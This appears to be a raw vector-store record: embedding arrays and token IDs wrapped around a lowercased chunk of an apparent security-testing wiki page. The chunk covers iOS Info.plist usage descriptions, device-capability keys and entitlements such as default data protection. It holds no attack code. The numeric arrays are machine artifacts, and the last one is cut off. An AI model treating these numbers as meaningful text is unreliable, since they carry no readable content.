-0.7777261137962341, 0.03493644669651985, -0.049585241824388504, 0.2036769986152649, -0.35896071791648865, -0.34541043639183044, -0.06655547767877579, 0.6226813197135925, 0.7731068134307861, -1.112989068031311, 0.43428516387939453, -0.4537985920906067, 0.9418565630912781, 0.14685791730880737, 0.049911387264728546, -0.6346633434295654, 0.6820890307426453, -0.8337403535842896, -1.0572677850723267, 0.5286378264427185, -0.11909240484237671, 0.1701846867799759, -0.2772705852985382, -0.21856743097305298, 0.4999575912952423, -0.5517594218254089, 0.16686949133872986, 0.9577153921127319, 0.47840410470962524, 0.23942530155181885, -0.10585570335388184, 0.4123181700706482, 0.4095853865146637, -0.09770732372999191, 0.2489793449640274, 0.08820075541734695, -0.4821113348007202, 0.13730253279209137, -0.894048273563385, 0.20039404928684235, -0.8111303448677063, 0.08894647657871246, 0.36632418632507324, -0.018728096038103104, 0.3336518406867981, -0.29547202587127686, -0.9132212996482849, 0.1473584771156311, -0.04048508033156395, -0.133822500705719, 0.7933722734451294, 0.6703178286552429, -0.0029173267539590597, -0.2676675021648407, 0.2736254036426544, 0.5347679853439331, -0.10346738249063492, -0.5536452531814575, 0.8341493010520935, 0.4414343237876892, -0.6565279960632324, 1.1548962593078613, 0.1310366541147232, -0.7891152501106262, -0.5421222448348999, -0.11212121695280075, -0.3573501408100128, 0.4145248830318451, -0.1105302944779396, -0.05768817290663719, 0.1740322858095169, -0.11740950495004654, 0.20897282660007477, 0.39207443594932556, 0.3735838234424591, 0.08492411673069, -0.8816980719566345, 0.5208811163902283, 0.09444994479417801, 0.28551867604255676, 0.35768768191337585, -0.8863978385925293, -0.19718895852565765, -0.558649480342865, -0.1928042769432068, 0.5365496277809143, 0.15925778448581696, 0.8989213705062866, 0.042715415358543396, 0.0267796590924263, 0.02279108203947544, -0.31187233328819275, 0.7738314270973206, 0.2283843606710434, 0.5895874500274658, 0.7942835092544556, 0.21584121882915497, -1.0113734006881714, -0.5128247737884521, 0.08551713079214096, -0.49023881554603577, 0.0950237363576889, -0.5729012489318848, -0.2618248164653778, 0.40215083956718445, 0.7976871132850647, -0.4292859733104706, -0.2394586205482483, -0.7280949950218201, -0.7040342688560486, 0.016002045944333076, 0.12229087203741074, -0.3131101727485657, 0.39934274554252625, 0.11963225156068802, 0.21883521974086761, -0.2664463222026825, -0.3218439817428589, 0.2821188271045685, -0.3653123676776886, 0.12813696265220642, -0.8409545421600342, 0.3639500141143799, -0.6357451677322388, -0.4530220925807953, -0.36334797739982605, -0.5936678051948547, -0.8247576951980591, -0.7367808222770691, -0.38608935475349426, 0.2606191635131836, -0.7284107208251953, 0.43309286236763, -0.7484847903251648, -0.2593002915382385, 0.026088772341609, -0.9208544492721558, 0.25384509563446045, 0.9293030500411987, -0.8041000366210938, -0.22088710963726044, 0.76984041929245, 0.35861799120903015, 0.5391185283660889, -0.884093701839447, -0.025821756571531296, -0.3421403467655182, 0.3748953938484192, 0.20080465078353882, 0.45714452862739563, -0.4249889850616455, 0.34193432331085205, 0.04351389408111572, -0.7037439346313477, 0.01773427426815033, -0.5815595984458923, -0.47180670499801636, 0.2565995454788208, -0.7928521037101746, 0.011462563648819923, 0.24838753044605255, 0.6312282681465149, 0.06010395288467407, -0.6243142485618591, 0.3984379172325134, 0.3020336925983429, -0.24703383445739746, -0.025592593476176262, 0.056169480085372925, -0.018908869475126266, -0.551750659942627, -0.07130908221006393, 0.05983344465494156, -0.4223431944847107, 0.24867264926433563, -0.2924545109272003, -0.13345125317573547, -0.10151124745607376, 0.16814076900482178, 0.652152419090271, 0.7957733869552612, 0.6944736838340759, 0.28322044014930725, 0.7111136317253113, 0.05067189037799835, -0.9618297815322876, -0.16500289738178253, -1.3163286447525024, -0.07144846767187119, -0.06497213989496231, -0.06429999321699142, -0.7549761533737183, -0.46557703614234924, 0.5150981545448303, 0.18941204249858856, 0.10339611768722534, -0.3150758743286133, -0.06709393858909607, -0.07182873040437698, 0.5445665121078491, 1.067265510559082, -0.6272615194320679, -0.41403767466545105, -0.13003170490264893, 0.2327122986316681, -0.4985531270503998, -0.8128588199615479, 0.6116284132003784, 1.0857630968093872, 0.3665173351764679, -0.8143154978752136, -0.6032567024230957, -0.0827954113483429, 0.9340739846229553, 0.4455977976322174, 0.35341376066207886, 0.05475085228681564, -1.105371117591858, 0.9768862128257751, -0.6447433829307556, 0.42325833439826965, -0.13879048824310303, -0.13650619983673096, -0.3661457300186157, -0.5934733748435974, -0.3605228066444397, 0.40459129214286804, -0.0852874368429184, -0.1836005002260208, 0.7459105253219604, 0.4909987449645996, 0.8482387065887451, -0.7222514748573303, 0.08335470408201218, -0.35072100162506104, 0.9675933122634888, 0.27889731526374817, -0.13737410306930542, -0.5409204363822937, 0.11577408760786057, 0.7953768968582153, -0.37675240635871887, 0.52158123254776, 0.4078894853591919, 0.34742406010627747, -0.2544689476490021, 0.12200294435024261, -0.43468350172042847, -0.06730477511882782, -0.5444285273551941, -0.39293941855430603, -0.11162009835243225, 0.3175013065338135, 0.08504313230514526, -0.255940705537796, -0.30456510186195374, 0.3332225978374481, -0.7660528421401978, 0.4660334587097168, 0.3362284302711487, 0.28002721071243286, 0.35555946826934814, -0.08236443251371384, -0.657298743724823, 0.8158869743347168, 0.9893983006477356, -0.02235160768032074, 0.23372726142406464, 0.9789970517158508, 0.2658078372478485, -0.19971168041229248, -0.16325297951698303, -0.06891504675149918, -0.6439709663391113, 0.2972754240036011, 0.13439810276031494, -0.5609890222549438, -0.7553908824920654, -0.06885425001382828, -0.13357895612716675, -0.21075567603111267, 0.38011521100997925, -0.2421383559703827, 0.2183946669101715, -0.6540133357048035, 0.3454352617263794, -0.1008491963148117, -0.21665987372398376, 0.49116799235343933, -0.6617594361305237, -0.3923371732234955, 0.8858645558357239, -0.07882869243621826, 0.9988570213317871, -0.30702248215675354, 0.2357153594493866, 0.27112916111946106, 0.35823023319244385, 0.13327282667160034, -0.7959533929824829, -0.2567088007926941, -0.10703554004430771, -0.04053681343793869, -0.5997275114059448, -0.046518467366695404, -0.0725143551826477, 0.7036834955215454, -0.12100531905889511, -0.05286344513297081, -0.6302534341812134, -0.19507141411304474, 0.02998938038945198, -1.039777159690857, 0.6608756184577942, -0.2639240622520447, -0.4278850555419922, 0.11579329520463943, -0.034336306154727936, -0.15010441839694977, 0.4834839999675751, -0.43784862756729126, -0.063905730843544, -0.5504802465438843, -0.21741944551467896, 0.03575623780488968, 0.8603304028511047, -0.014055918902158737, -0.04291168227791786, 0.14520806074142456, -1.0335148572921753, -0.36589157581329346, 0.23491209745407104, -0.41503769159317017, -0.5427756905555725, 0.5244466066360474, 0.15925413370132446, 0.7095194458961487, 0.935160756111145, -0.5649656057357788, -0.0913294330239296, 0.062096647918224335, 0.6357647776603699, -0.7407837510108948, 1.114065408706665, 0.33428439497947693, 0.16486139595508575, 0.521722674369812, 0.1958605796098709, 0.888524055480957, -0.3091755509376526, -0.12633416056632996, -0.16955339908599854, -0.37647736072540283, -0.7475823163986206, -0.42871275544166565, -0.19522646069526672, 0.24696867167949677, -0.028004052117466927, -0.2978135645389557, -0.413891464471817, 0.13165776431560516, -0.9339134097099304, 0.3541014790534973, -0.10225650668144226, 0.2697441577911377, 0.3241829574108124, 0.34335654973983765, 1.034072995185852, -1.468782901763916, 4.1936354637146, 0.6652255654335022, 0.14835816621780396, 0.1968737244606018, 0.30284541845321655, 0.3461458683013916, 1.475145697593689, -0.7377657890319824, -0.5381930470466614, -0.3597770035266876, -0.2287241369485855, -0.6411256790161133, 0.3357948362827301, 0.42013171315193176, 0.13655252754688263, 0.43228036165237427, -0.1160799115896225, 0.0617867074906826, -0.1097959652543068, -1.1997284889221191, -0.9831259846687317, 0.059342797845602036, -0.10448293387889862, 0.9613281488418579, 0.21656203269958496, 0.2804338037967682, 0.17177730798721313, -0.48273196816444397, -0.15149496495723724, -0.01356880646198988, 0.33913493156433105, -0.567908763885498, 0.3346739113330841, -0.47380292415618896, -0.7419649362564087, 0.3120449185371399, 0.00582808256149292, -0.5766682028770447, -0.008771011605858803, 0.3398726284503937, 0.23674724996089935, 0.4615730047225952, -0.009911446832120419, -0.10715877264738083, 0.09568995982408524, 0.6304641962051392, -0.5033396482467651, 0.3364544212818146, 0.8070039749145508, -1.0826085805892944, 0.7004089951515198, -0.17262248694896698, 0.8022844791412354, -0.5351239442825317, -0.5984948873519897, -0.19397833943367004, -0.02524641528725624, -0.7110275626182556, 0.07767004519701004, -0.024039926007390022, 0.5033955574035645, -0.6363525390625, -0.006105587352067232, -0.09723185002803802, -0.9400498270988464, 0.4348866045475006, -0.4647686183452606, 0.9215846061706543, 0.17436109483242035, -0.7641929984092712, -0.471435010433197, -0.2876794934272766, -0.307370126247406, -0.24439047276973724, 0.721298098564148, -0.37993037700653076, 0.12796562910079956, 0.5411880016326904, 0.9404676556587219, -0.6750005483627319, -0.37202537059783936, -0.5233582854270935, -0.802992582321167, -0.09441233426332474, 1.5477107763290405, 0.5021398663520813, -0.0481102392077446, -0.9245408773422241, 0.89166659116745, 0.12161315977573395, 0.6482629179954529, -0.043470513075590134, -0.06274331361055374, -0.4152211844921112, 0.45217451453208923 ]
[ 5310, 1005, 1055, 6115, 1012, 1996, 2206, 9170, 2742, 2003, 1037, 3937, 10467, 1997, 2023, 14612, 7709, 1024, 2292, 5310, 3207, 7011, 11314, 2015, 1027, 5310, 3207, 7011, 11314, 2015, 1012, 3115, 10128, 5310, 3207, 7011, 11314, 2015, 1012, 22017, 2140, 1006, 9292, 3240, 1024, 1000, 2038, 15532, 4783, 29278, 2063, 1000, 1007, 1027, 1027, 6270, 1063, 1013, 1013, 6366, 3145, 24925, 2078, 5167, 2182, 1013, 1013, 10651, 1996, 5210, 17245, 5310, 3207, 7011, 11314, 2015, 1012, 2275, 1006, 2995, 1010, 9292, 3240, 1024, 1000, 2038, 15532, 4783, 29278, 2063, 1000, 1007, 5310, 3207, 7011, 11314, 2015, 1012, 26351, 8093, 10698, 4371, 1006, 1007, 1013, 1013, 2749, 1996, 10439, 2000, 10651, 5310, 3207, 7011, 11314, 2015, 1065, 2043, 4975, 8154, 4904, 15380, 2005, 2019, 16380, 4646, 1010, 2191, 2469, 2008, 1996, 3145, 24925, 2078, 2951, 2003, 8342, 2004, 2112, 1997, 4070, 8154, 4904, 1012, 2023, 2097, 3499, 5198, 2000, 3154, 2037, 6115, 2077, 4895, 7076, 9080, 2989, 2019, 4646, 1012, 10439, 9859, 5243, 2818, 10439, 2038, 1037, 4310, 2188, 14176, 1998, 2003, 5472, 8758, 2098, 1010, 2061, 2008, 2027, 3685, 3229, 5123, 2291, 4219, 2030, 6764, 8250, 2011, 1996, 2291, 2030, 2011, 2060, 18726, 1012, 2122, 9259, 2024, 7528, 3081, 5472, 8758, 6043, 1006, 9875, 1012, 17879, 1007, 1010, 2029, 2024, 16348, 2011, 1996, 9480, 18667, 2094, 1006, 6097, 1007, 10915, 3229, 2491, 7705, 3081, 1037, 16293, 5331, 1012, 2070, 9859, 1013, 6656, 2015, 2064, 2022, 26928, 2011, 1996, 10439, 1005, 1055, 9797, 1006, 1041, 1012, 1043, 1012, 2951, 3860, 2030, 3145, 24925, 2078, 6631, 1007, 1998, 2097, 3495, 2202, 3466, 2044, 1996, 8272, 1012, 2174, 1010, 2005, 2500, 1010, 1996, 5310, 2097, 2022, 12045, 2356, 1996, 2034, 2051, 1996, 10439, 4740, 2000, 3229, 1037, 5123, 7692, 1012, 3800, 7817, 2030, 8192, 6412, 7817, 2024, 7661, 6981, 2008, 2024, 3253, 2000, 5198, 1999, 1996, 2291, 1005, 1055, 6656, 5227, 9499, 2043, 17942, 6656, 2000, 3229, 5123, 2951, 2030, 4219, 1012, 2065, 2383, 1996, 2434, 3120, 3642, 1010, 2017, 2064, 20410, 1996, 6656, 2015, 2443, 1999, 1996, 18558, 1012, 20228, 2923, 5371, 1024, 2330, 1996, 2622, 2007, 1060, 16044, 1012, 2424, 1998, 2330, 1996, 18558, 1012, 20228, 2923, 5371, 1999, 1996, 12398, 3559, 1998, 3945, 2005, 1996, 6309, 3225, 2007, 1000, 9394, 1011, 1000, 1012, 2017, 2089, 6942, 1996, 3193, 2000, 4653, 1996, 6315, 5300, 2011, 2157, 1011, 22042, 1998, 17739, 1000, 2265, 6315, 6309, 1013, 5300, 1000, 1006, 2023, 2126, 2005, 2742, 1000, 9394, 1011, 3295, 2043, 1999, 2224, 8192, 6412, 1000, 2097, 2735, 2046, 24978, 4135, 10719, 2860, 10222, 13429, 10600, 18655, 2229, 23235, 3258, 1007, 1012, 2065, 2069, 2383, 1996, 24531, 1024, 4895, 5831, 2361, 1996, 24531, 1012, 1996, 18558, 1012, 20228, 2923, 2003, 2284, 1999, 18093, 1013, 1026, 10439, 18442, 1028, 1012, 10439, 1013, 18558, 1012, 20228, 2923, 1012, 10463, 2009, 2065, 2734, 1006, 1041, 1012, 1043, 1012, 20228, 21823, 2140, 1011, 10463, 20950, 2487, 18558, 1012, 20228, 2923, 1007, 2004, 4541, 1999, 1996, 3127, 1000, 16380, 3937, 3036, 5604, 1000, 1010, 2930, 1000, 1996, 18558, 1012, 20228, 2923, 5371, 1000, 1012, 22459, 2035, 3800, 7817, 18558, 1012, 20228 ]
hack_tricks
430.txt
4
##ist keys, usually ending with usagedescription : < plist version = " 1. 0 " > < dict > < key > nslocationwheninuseusagedescription < / key > < string > your location is used to provide turn - by - turn directions to your destination. < / string > device capabilitiesdevice capabilities are used by the app store to ensure that only compatible devices are listed and therefore are allowed to download the app. they are specified in the info. plist file of the app under the uirequireddevicecapabilities key. < key > uirequireddevicecapabilities < / key > < array > < string > armv7 < / string > < / array > typically you'll find the armv7 capability, meaning that the app is compiled only for the armv7 instruction set, or if it ’ s a 32 / 64 - bit universal app. for example, an app might be completely dependent on nfc to work ( e. g. a " nfc tag reader " app ). according to the archived ios device compatibility reference, nfc is only available starting on the iphone 7 ( and ios 11 ). a developer might want to exclude all incompatible devices by setting the nfc device capability. entitlementsentitlements are key value pairs that are signed in to an app and allow authentication beyond runtime factors, like unix user id. since entitlements are digitally signed, they can ’ t be changed. entitlements are used extensively by system apps and daemons to perform specific privileged operations that would otherwise require the process to run as root. this greatly reduces the potential for privilege escalation by a compromised system app or daemon. for example, if you want to set the " default data protection " capability, you would need to go to the capabilities tab in xcode and enable data protection. this is directly written by xcode to the < appname >. entitlements file as the com. apple. developer. default - data - protection entitlement with default value nsfileprotectioncomplete. in the ipa we might find this in the embedded. mobileprovision as : < key > entitlements < / key > < dict >... < key > com. apple. developer. default - data - protection < / key > < string > nsfileprotectioncomplete < / string > < / dict > for
[ 0.11196420341730118, -0.34026870131492615, 0.10600899904966354, 0.31733444333076477, 0.03441522270441055, -0.07066131383180618, 0.5607823133468628, 0.15720491111278534, 0.3271450102329254, 0.766189694404602, 0.1320919245481491, 0.03484455123543739, 0.5523038506507874, -0.5162558555603027, -0.2986433804035187, -0.02666064351797104, -0.8355506658554077, 0.2659294605255127, -0.9291723966598511, -0.04237832501530647, 0.4573359191417694, 0.23596379160881042, -0.7592636942863464, -0.49958357214927673, -0.16028811037540436, 0.5565283298492432, 0.8050012588500977, 0.3271409571170807, 0.6560859084129333, 0.8395717144012451, 0.19152973592281342, 0.22605566680431366, -0.1238635703921318, -0.425141841173172, -0.3807954788208008, -0.18666765093803406, 1.1032413244247437, -0.33461180329322815, 0.019099976867437363, -0.929000198841095, 0.4715460240840912, -0.08604241162538528, -0.13373683393001556, -0.2796558737754822, -0.39690470695495605, -0.4291934072971344, -0.009860237129032612, -0.6099687218666077, -0.05602182447910309, -0.5495519638061523, 0.17015230655670166, 0.3958681523799896, 0.33627116680145264, 0.4661117494106293, -0.11503424495458603, 0.0035157727543264627, 0.18231327831745148, 0.6203154921531677, 0.12680436670780182, 0.16765491664409637, -0.5510858297348022, 0.35842832922935486, 0.2728935778141022, -0.5834983587265015, -0.11785398423671722, 0.3107874393463135, -0.07843183726072311, -0.3523489236831665, -0.4425443708896637, -0.5314304828643799, -0.6292331218719482, 0.6564013361930847, -0.3303127586841583, -1.2521755695343018, -0.33928942680358887, 0.10739818215370178, -0.00981810037046671, 0.21222659945487976, 0.2604965269565582, -0.03773052245378494, -0.12428782880306244, 0.8284231424331665, 0.1093360111117363, -0.30394884943962097, -0.32731619477272034, 0.11889174580574036, 0.5712758898735046, 0.5848622918128967, -0.389692485332489, -0.2428552508354187, 0.7200562357902527, 0.53597491979599, -0.7765632271766663, -0.7217822670936584, 0.45910921692848206, 0.5819761157035828, -0.2536674439907074, 0.22162799537181854, 0.06708063185214996, -0.39695701003074646, 0.4069036543369293, 0.8430681228637695, 0.15365207195281982, 0.39635297656059265, 0.0967111736536026, 0.8537740707397461, 0.46740686893463135, 0.006422024220228195, -0.04780967906117439, -0.3478928804397583, 0.4724525213241577, -0.6442382335662842, 0.17795848846435547, -0.8795287609100342, -0.4817844033241272, 0.5426645874977112, 0.5980002880096436, 0.11221379041671753, -0.48800456523895264, 0.8903244733810425, 0.09405432641506195, -0.18475496768951416, 0.4329151213169098, 0.0329740084707737, -0.19456931948661804, -0.3635784685611725, 0.2694943845272064, 0.19590145349502563, -0.2088356763124466, 0.2680726945400238, 0.07838448137044907, -0.019536904990673065, 0.3278101682662964, 0.686396062374115, -0.6074728965759277, 0.29038646817207336, 0.25985363125801086, 0.2508082985877991, 0.3638024926185608, -0.9900062084197998, -0.3445476293563843, 0.007016027346253395, -0.10898739099502563, 1.4057444334030151, 0.39642995595932007, 0.11062248796224594, -1.2411009073257446, -0.11745885759592056, -0.21338535845279694, 0.1757199913263321, 0.26683053374290466, 0.42726728320121765, 0.5574052333831787, 0.04717203974723816, 0.047897182404994965, 0.3702058792114258, -0.5067362785339355, 1.0217883586883545, -0.3199603855609894, 0.0034004379995167255, -0.2592627704143524, 0.48869791626930237, 0.15946230292320251, 0.3544072210788727, 0.17655982077121735, -0.10014470666646957, -0.9489805698394775, -0.09018697589635849, -0.34914258122444153, 0.3693658411502838, 0.1565120965242386, -0.06118568405508995, 0.5238692760467529, -0.2843194603919983, 0.7272465825080872, 0.6212134957313538, 0.17188066244125366, -0.03311816602945328, -0.22623015940189362, 0.743803858757019, -0.28429508209228516, 0.08087251335382462, 0.17358210682868958, 0.7687853574752808, -0.9639145731925964, 0.08615878969430923, -0.3848617672920227, -0.3599528670310974, -0.6652500033378601, -0.1850219964981079, -0.7338048219680786, 0.8659861087799072, -0.23269928991794586, 0.3973992168903351, 0.5445213317871094, -0.08017628639936447, -1.4757710695266724, -0.34497401118278503, -0.29064425826072693, -1.4025993347167969, -0.3944787085056305, -0.14316073060035706, 0.15192830562591553, 0.3253614604473114, -0.25651657581329346, -0.0383908748626709, 0.5264684557914734, 0.3831944465637207, -0.3595823049545288, 0.47826072573661804, 0.6410776376724243, -0.07215161621570587, -0.7335309386253357, -0.0309847891330719, -0.12625360488891602, -0.4882383942604065, 0.04294189438223839, 0.3185771107673645, -0.24950188398361206, 0.14562742412090302, 0.21536028385162354, 0.26794615387916565, 1.0741989612579346, 0.6913805603981018, -0.6667190790176392, -0.43733644485473633, -0.2763797342777252, 0.5192195773124695, -0.7635735869407654, 0.026602888479828835, -0.013635358773171902, 0.9169331192970276, 0.5095471143722534, 0.8746926784515381, 0.2917655408382416, 0.0013055331073701382, 0.21369557082653046, -0.134395569562912, 0.372917115688324, -0.006833512336015701, 0.5499961972236633, 0.7045457363128662, 0.35607558488845825, -0.11732500791549683, 0.6970361471176147, -0.23828382790088654, 0.12493664771318436, -0.17023208737373352, 0.5555140972137451, 0.38542571663856506, -0.3997703790664673, 0.5880723595619202, -0.13129378855228424, -0.23349609971046448, -0.7927660942077637, -0.3753759562969208, 1.1129746437072754, 0.870713472366333, -0.3365977108478546, -0.7983478307723999, 0.0023907003924250603, 0.25649791955947876, -0.3701171875, 0.35749107599258423, -0.3586095869541168, 1.0191458463668823, -0.5778900384902954, 0.6370711326599121, -0.3099292516708374, -0.8565419316291809, -0.716139018535614, -0.3211400508880615, -0.9442545771598816, 0.06292301416397095, -0.7658582329750061, -0.13244496285915375, 0.16010315716266632, -0.3066946566104889, 0.51344895362854, -0.9658502340316772, -0.37522512674331665, -0.36234116554260254, 0.832134485244751, 0.20613020658493042, 0.25219860672950745, -0.08268358558416367, -0.7147195935249329, 0.04235880821943283, -0.17913278937339783, 0.9629982113838196, -0.050375066697597504, -0.2827650308609009, -0.4767191410064697, -0.29462766647338867, -0.24666444957256317, -0.33519336581230164, 0.6590856313705444, 0.1770153045654297, -0.3987865746021271, -0.3051980435848236, 0.3529454469680786, -0.09104623645544052, 0.0748540535569191, 0.21557635068893433, -0.5049371719360352, 0.39905861020088196, 0.38372480869293213, -0.34155842661857605, 0.49895718693733215, 0.490388423204422, -0.6380789875984192, 0.3780810832977295, 0.16962431371212006, 0.5402966141700745, -0.4829602539539337, 0.3195075988769531, 0.3918472230434418, 0.39519205689430237, -0.28737446665763855, -0.17369571328163147, 0.07237540930509567, -0.4266267716884613, -0.5338256359100342, 0.21356627345085144, -0.070053830742836, 0.23438437283039093, -0.2511328458786011, -1.1205214262008667, 0.585354208946228, -0.11528957635164261, -0.43583816289901733, -0.27602458000183105, 0.029123470187187195, 0.7995402812957764, -0.32069990038871765, 0.3751627206802368, 0.10784387588500977, -0.48192164301872253, 0.29126325249671936, 0.6341102123260498, 0.3606027364730835, -0.8461475372314453, 0.36625462770462036, -0.26458290219306946, -0.4301496744155884, 0.17222796380519867, 0.5317767858505249, -0.37167465686798096, -0.37449586391448975, -0.5228551626205444, -0.196445494890213, -0.4699479639530182, -0.2220681756734848, -0.16901221871376038, 0.8950526118278503, 0.46325552463531494, -0.12044161558151245, -0.30403321981430054, -0.026508834213018417, 0.1888359636068344, -0.02745041996240616, -0.3084249198436737, 0.0740400031208992, 0.5088229775428772, 0.5420535802841187, -0.1343761533498764, -0.008016095496714115, -0.2512364387512207, 0.4864833950996399, -0.6026512384414673, 0.9718579053878784, 0.042910631746053696, 0.11421839147806168, 0.6183407306671143, -0.47782188653945923, -0.5302273631095886, 0.8430091142654419, 0.05955633893609047, 0.26945143938064575, -0.6055759787559509, 0.6387258172035217, -0.12341289222240448, 0.27005383372306824, 0.16116422414779663, 0.17255020141601562, -0.1749480813741684, -1.0115301609039307, -0.20164558291435242, -0.7763833999633789, -0.38269272446632385, 0.17948345839977264, 0.04530439153313637, 0.36847516894340515, -0.34578487277030945, -0.5191896557807922, -0.6858654618263245, 0.4500769376754761, 0.7054462432861328, 0.7967331409454346, 0.025100955739617348, 0.5770078897476196, 0.5239682793617249, -0.6436148285865784, 0.4712845981121063, -0.5097470283508301, -0.003176514059305191, 0.14404727518558502, 0.8738932013511658, -0.07825525850057602, 0.1208416298031807, -0.8627462983131409, -0.5723358988761902, -0.4446505904197693, -0.27617546916007996, 0.05283906310796738, 0.4992375075817108, -0.4665813744068146, -0.571597158908844, -0.6058909893035889, 0.10975189507007599, -0.6580920815467834, -0.5318508148193359, -0.32031136751174927, 0.5693145990371704, 0.8271167278289795, 0.058722496032714844, 0.2124117761850357, -0.7234861254692078, -0.2450588345527649, 0.27461889386177063, 0.23046280443668365, -0.7050136923789978, -0.3281313180923462, -0.3225042521953583, -0.6469180583953857, 0.12905997037887573, 0.7535617351531982, -0.3195314407348633, 0.27985110878944397, -0.8001071810722351, -0.18876299262046814, 0.9563289880752563, -0.18680208921432495, -0.7428784370422363, -0.29238954186439514, 0.25388261675834656, 0.053964704275131226, 0.4224890470504761, -0.27631908655166626, -0.5207932591438293, 0.3686548173427582, -0.26332128047943115, 0.45391687750816345, -0.6979495286941528, -0.10646280646324158, 0.279285192489624, 0.13679026067256927, -0.10441378504037857, 0.25437429547309875, -1.080613136291504, 0.8581777215003967, 0.09201587736606598, 0.5129960775375366, -0.1357482373714447, -0.13660089671611786, 0.4062519967556, -0.560040295124054, -0.43392127752304077, 0.30660226941108704, 0.4298725724220276, -0.1221659928560257, 0.32027798891067505, -0.32112500071525574, -0.585880696773529, 0.582979142665863, -0.5317807793617249, 0.56282639503479, 0.07070182263851166, 0.2166287899017334, -0.4296572208404541, -0.6028358936309814, 0.9392285943031311, 0.3569748103618622, 0.5038021802902222, -0.9119410514831543, -0.5656926035881042, 0.028216619044542313, -0.21352282166481018, 0.12389127910137177, 0.247651606798172, 0.002281496999785304, -0.3399697542190552, -0.025015035644173622, 0.17695215344429016, -0.35424375534057617, -0.6708108186721802, -0.5979129672050476, 0.017591284587979317, -0.3489130735397339, -0.16886530816555023, 0.5902941823005676, 0.18950657546520233, -0.08770691603422165, 0.9441741108894348, -0.37648805975914, -0.14281204342842102, -1.0405070781707764, 0.010525154881179333, -0.49878019094467163, 0.07524372637271881, -0.32060152292251587, -0.1452358365058899, -0.030044350773096085, 0.23292648792266846, 0.5426478385925293, 0.856225311756134, 0.5412083864212036, -0.4763524532318115, -0.29412949085235596, 0.21156489849090576, -0.04330791160464287, 0.16823779046535492, 0.14447851479053497, 0.9205100536346436, -0.3359895944595337, -0.43450796604156494, -0.4036935269832611, -0.32882431149482727, -0.6112703680992126, -0.35911238193511963, 0.44659918546676636, -0.3634773790836334, 0.3197610676288605, -0.37530604004859924, -1.0315687656402588, -0.09114504605531693, 0.470693439245224, -0.035000767558813095, -0.757839560508728, 0.0038346974179148674, 0.22284601628780365, -0.010353637859225273, -0.41104474663734436, -0.1427178829908371, -0.7661927938461304, -0.22897298634052277, 0.10850834846496582, 0.51323401927948, -0.41758018732070923, 0.07088184356689453, -0.16826122999191284, 0.02728026919066906, 0.27620720863342285, 0.5408709645271301, -0.6011276841163635, -0.33886435627937317, -0.544245183467865, 0.4415105879306793, -0.5199702382087708, 0.7386410236358643, -0.31232693791389465, 0.48972567915916443, -0.05841827020049095, -0.49299895763397217, 0.07979051023721695, 0.4856104254722595, -0.38071882724761963, 0.6073247194290161, 0.884562611579895, -0.17858226597309113, -0.3519100248813629, 0.04913052171468735, 0.6834779381752014, -0.06572051346302032, -0.4580218493938446, -1.2412348985671997, 0.48347803950309753, -0.5406988859176636, -1.2324002981185913, 0.9228916764259338, 0.4501809775829315, 0.0015063161263242364, 0.16032366454601288, -0.5355990529060364, -0.0619809664785862, -0.562660276889801, 0.0019418690353631973, 1.091233253479004, 0.00923143234103918, 0.03652235493063927, -0.6911830306053162, 0.6894456148147583, 0.9527378678321838, -0.685359537601471, 0.292280375957489, -0.018645688891410828, -0.11741378903388977, -0.03673720359802246, -0.7441709041595459, 0.018329530954360962, -0.8866745829582214, 0.10054754465818405, 0.194092258810997, 0.23301292955875397, 0.683346688747406, -0.2052793800830841, -1.0832724571228027, 0.1359289437532425, 0.3214600086212158, -0.6300573348999023, 0.10978846251964569, 0.3967945873737335, 0.5153051018714905, 0.03237295523285866, 0.18873988091945648, -0.49590957164764404, -0.2576724588871002, 0.20339243113994598, 0.7385131120681763, 0.25911983847618103, -0.7299441695213318, 0.741050660610199, 0.28102394938468933, -0.7733530402183533, -0.2492770403623581, 0.2468218356370926, -0.31705141067504883, 0.47997036576271057, -0.5310146808624268, 0.3450591564178467, 0.6325536966323853, 0.25389569997787476, -0.5559187531471252, 0.2650231122970581, 0.14967645704746246, 0.23563049733638763, -0.3766489326953888, 0.7028155326843262, 0.34595707058906555, 0.2257922887802124, 0.5588430762290955, -0.46823829412460327, -0.22659960389137268, -0.5439528822898865, 0.06240282580256462, -0.18385642766952515, 0.38651713728904724, 0.8903400897979736, -0.4799850285053253, -0.07948576658964157, -0.2514631152153015, -0.24248015880584717, 0.2131345272064209, -0.2671545743942261, 0.8101813793182373, 1.084174633026123, -0.12620753049850464, -0.20649613440036774, 0.022381478920578957, 0.9404008984565735, 0.01647966541349888, -0.15601733326911926, -0.5504785180091858, -0.3445751667022705, 0.2516237795352936, 0.47646310925483704, -0.15530651807785034, -0.6187594532966614, -0.5982173085212708, -0.7547016739845276, -0.41488415002822876, 0.1764494776725769, -0.42794498801231384, 0.0819757804274559, 0.3479318618774414, -0.24489204585552216, -0.04148535057902336, -0.15631826221942902, 0.4763130247592926, -0.4821411967277527, -0.19555509090423584, -0.5524984002113342, 0.29465052485466003, -0.6249116659164429, -0.5954518914222717, -0.593501627445221, 0.2465992420911789, -1.0988397598266602, -0.12574505805969238, -0.10019343346357346, -0.1245586946606636, -0.9647493362426758, 0.7073405385017395, -0.6167978644371033, -0.2797742187976837, -0.20635774731636047, -0.41865652799606323, 0.0027498039416968822, 0.7244288921356201, -0.11429604887962341, 0.08062439411878586, 0.6832312345504761, 0.17621323466300964, 0.47544345259666443, -0.4980718493461609, 0.1277189999818802, -0.7310776710510254, 0.3038467764854431, -0.12361153215169907, -0.05449648201465607, -0.6713525652885437, 0.2548139691352844, -0.11515148729085922, -0.5415294766426086, 0.12411244213581085, -0.2674119472503662, 0.10025259107351303, 0.3317280411720276, -0.0075299921445548534, 0.17516984045505524, 0.28993475437164307, 1.181760311126709, 0.6252990961074829, -0.62198805809021, 0.48352426290512085, 0.4530048072338104, -0.26947706937789917, 0.07075610011816025, 0.39717766642570496, -0.07168398052453995, -0.6990495920181274, -0.06061738356947899, 0.12295909970998764, -0.554118275642395, -0.03337998315691948, -0.19537290930747986, -0.08728805184364319, -0.598160982131958, 0.18498875200748444, 0.2968595623970032, 0.4675554633140564, 0.7247703671455383, -0.03973829001188278, 0.5404271483421326, -0.06480991095304489, -1.4490070343017578, -0.14157037436962128, -0.5955624580383301, -0.5685052275657654, -0.17350409924983978, -0.1836846023797989, -0.706612229347229, -0.48870334029197693, -0.00889165885746479, -0.3388848304748535, 0.08160374313592911, 0.25600504875183105, 0.4911518096923828, 0.31544366478919983, 0.2587779760360718, 0.7131360769271851, -0.4718377888202667, -0.90395188331604, -0.5372181534767151, 0.19358813762664795, -0.1494501382112503, -0.6233134865760803, 